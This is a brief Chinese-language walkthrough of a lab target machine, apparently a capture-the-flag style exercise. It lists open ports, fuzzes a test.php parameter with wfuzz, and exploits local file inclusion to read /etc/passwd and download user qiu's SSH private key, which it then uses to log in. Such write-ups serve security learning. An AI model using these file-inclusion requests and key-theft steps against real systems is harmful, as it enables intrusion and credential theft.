第一步:确定靶机IP为192.168.40.129

第二步:扫描后台及开放端口


#开放端口
22 --- ssh
25 --- SMTP简单邮件传输协议
80 --- HTTP万维网传输信息协议
110 --- POP3邮件协议3
139 --- NetBIOS服务
443 --- https服务
445 --- SMB协议
3306 --- Mysql
8080 --- Internet 信息服务
第三步:尝试访问扫到的端口和文件



第四步:尝试使用kali自带的FUZZ

#使用kali自带的FUZZ
wfuzz -u "http://192.168.40.129/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
第五步:尝试访问/etc/passwd敏感文件,发现qiu用户,且权限为1000

#/etc/passwd
http://192.168.40.129/test.php?file=/etc/passwd
第六步:尝试查看用户qiu的 ssh 密钥

#查看用户qiu的 ssh 密钥
http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa
第七步:尝试利用文件包含来得到qiu的ssh私钥文件,并使用cat查看

#得到ssh私钥文件
curl http://192.168.40.129/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa
第八步:给予密钥文件权限为600,以正常使用

chmod 600 id_rsa
第九步:使用这个私钥登录qiu用户,发现连接成功

ssh -i id_rsa [email protected]
FROM IYU_